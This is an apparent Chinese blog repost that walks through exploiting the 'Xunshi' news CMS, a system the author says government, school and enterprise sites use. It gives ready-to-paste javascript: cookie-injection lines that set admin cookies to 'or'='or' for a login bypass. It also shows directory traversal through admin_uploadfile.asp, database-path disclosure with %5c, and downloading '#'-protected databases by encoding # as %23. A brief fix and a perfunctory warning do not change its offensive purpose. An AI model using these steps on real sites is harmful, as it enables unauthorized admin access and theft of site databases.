讯时新闻系统漏洞
這套系統(tǒng)有N年版,一般的政府、學(xué)校和企事業(yè)單位用得多,
特證: 顯示新聞News_View.asp?NewsID= 登陸login.asp?id=3,最主要的特證是用的一個(gè)有一個(gè)EDIT目錄,下面的數(shù)據(jù)庫是用的db/#ewebeditor.asp
以上特證只要中二個(gè)就基本可以肯定是這套系統(tǒng)
漏洞:這套系統(tǒng)原來有N多漏洞,但經(jīng)過改進(jìn),現(xiàn)在主要的問題是COOKIES注入和列目錄問題
具體的代碼我就講了,直接講利用
第一板斧:
老版中存在一個(gè)后臺(tái)COOKIES注入
直接打開登陸后臺(tái),然后在地址欄輸入
javascript:alert(document.cookie="adminuser="+escape("‘or'='or'"));javascript:alert(document.cookie="adminpass="+escape("‘or'='or'"));javascript:alert(document.cookie="admindj="+escape("1″));
這個(gè)功能就是把用戶名和密碼設(shè)置 為'or'='or' (這個(gè)有什么用不說了吧),還有把a(bǔ)dmindj設(shè)置為1
按回車后,直接訪問 /管理目錄/admin_index.asp就進(jìn)后臺(tái)了,后臺(tái)直接有備份功能
管理目錄自己找一下,一般在LOGIN.ASP的同級(jí)目錄
第二析斧:
其中的投票文件過濾不嚴(yán),js-xgxx.asp文件的xgnews參數(shù)沒有過濾,具體的可以一朋友寫的專用小工具(也可以對(duì)其它某些有COOKIES注入,但關(guān)鍵字和其它一些參數(shù)是固定了,作用可能不大,只是我們寫來娛樂一下的,牛人不要笑)
用這個(gè)直接可以得到管理員用戶名和密碼的MD5
有了MD5可以去破解,如果破不了把上面的改一下
javascript:alert(document.cookie="adminuser="+escape(" 用戶名"));javascript:alert(document.cookie="adminpass="+escape("密碼md5值")); javascript:alert(document.cookie="admindj="+escape("1″));
確定后直進(jìn)后臺(tái)
第三板斧:
如果以上還是不行那就看......還是cookies問題,有某些版本中過濾了COOKIES中的'號(hào),這樣我們的萬能密碼就起不了作用了,asp文件的 COOKIES注入過沒戲了,但是admindj=1還有用,輸入完上面的代碼后,如果還進(jìn)不了后臺(tái),那就訪問 /edit/admin_uploadfile.asp?id=14&dir=..,然后跟EWEBEDITOR的列目錄漏洞一樣,只需要改變 dir=后面的參數(shù)就可以看到查應(yīng)的目錄,如dir=..\.. dir=..\..\..
可以找一些他的數(shù)據(jù)庫備份啊或其它的.
?
當(dāng)看到它后臺(tái)目錄后,可以耐心的找找,沒準(zhǔn)能找到很有用的東西,我就找到了整個(gè)網(wǎng)站的備份,是rar格式的,我直接下載下來了,通過這個(gè)我就知道了webshell,當(dāng)然這是在其他方面漏洞很少而又很幸運(yùn)的前提下才有的。我試過別的方法得webshell,但是沒成功…
?
另外還有個(gè)漏洞可能會(huì)有用
?
我們來看admin目錄下的admin_conn.asp 文件,這文件代碼很簡單就幾句話,我們來看源碼
<%
mdb="../"
%><!--#include file = ../admin_conn.asp -->
夠簡單吧,但是可能就是因?yàn)槌绦騿T疏忽,所以出現(xiàn)問題啦,這是一個(gè)數(shù)據(jù)庫鏈接文件,但是因?yàn)檫@文件沒有容錯(cuò)語句,所以導(dǎo)致暴庫漏洞下面是我的本機(jī)地址http://localhost/news/admin/admin_conn.asp,我們把最后一個(gè)“/”號(hào)改成“%5c”然后,哈哈,暴庫數(shù)據(jù)庫地址拉,大家看截圖
,而且這套系統(tǒng)沒有數(shù)據(jù)庫防下載措施,數(shù)據(jù)庫可以輕易下載
這個(gè)漏洞修復(fù)方法很簡單,只要添加防錯(cuò)語句即可
”O(jiān)N ERROR RESUME NEXT“這一句話!!!!
這漏洞應(yīng)該是程序員疏忽造成的,在根目錄下也有個(gè)admin_conn.asp 文件,這文件程序員添加了防錯(cuò)語句,
這漏洞危害較大,請(qǐng)大家不要拿這程序拿來做壞事哦!!!
?
如果得到了webshell,就可以下載它的數(shù)據(jù)庫了,看哪個(gè)數(shù)據(jù)庫對(duì)你有用就下載哪個(gè),有時(shí)管理員會(huì)在數(shù)據(jù)庫名稱上做一些手腳,讓你下載不成功,那么下面的方法一定有用:
數(shù)據(jù)庫名前加“#”
只需要把數(shù)據(jù)庫文件前名加上“#”,然后修改數(shù)據(jù)庫連接文件(如conn.asp)中的數(shù)據(jù)庫地址。原理是下載的時(shí)候只能識(shí)別“#”號(hào)前名的部分,對(duì)于后面的自動(dòng)去掉,比如你要下載:http://www.pcdigest.com/date/#123.mdb (假設(shè)存在的話)。無論是 IE 還是 FlashGet等下到的都是http://www.test.com/date/index.htm(或index.asp、default.jsp等你在 IIS設(shè)置的首頁文檔)
另外在數(shù)據(jù)庫文件名中保留一些空格也起到類似作用,由于HTTP協(xié)議對(duì)地址解析的特殊性,空格會(huì)被編碼為“%20”,如http://www.test.com/date/123 456.mdb,下載的時(shí)http://www.test.com/date/123%20456.mdb。而我們的目錄就根本沒有123%20456.mdb這個(gè)文件,所以下載也是無效的。這樣的修改后,即使你暴露了數(shù)據(jù)庫地址,一般情況下別人也是無法下載!
?
“#”號(hào)方案的不可行性:其實(shí)在較早的一篇博客堂文章中已經(jīng)提到這個(gè)問題了。將“#”號(hào)替換為“%23”就可以突破這個(gè)“關(guān)卡”了,比如:http://www.abc.com/#data.mdb,就直接在瀏覽器中輸入:http://www.abc.com/%23data.mdb 就可以下載了!
空格方案就不必多說了,我在本機(jī)的試驗(yàn)證明,在瀏覽器地址欄中直接寫 http://localhost/testdata.mdb 沒有任何問題很順利就下載到了這個(gè) test data.mdb,不知作者是什么解決方案。
轉(zhuǎn)載于:https://www.cnblogs.com/shanmao/archive/2012/11/15/2772416.html
總結(jié)
- 上一篇: Kafka深入浅出(一)
- 下一篇: jquery选择器可以利用后代和直系后代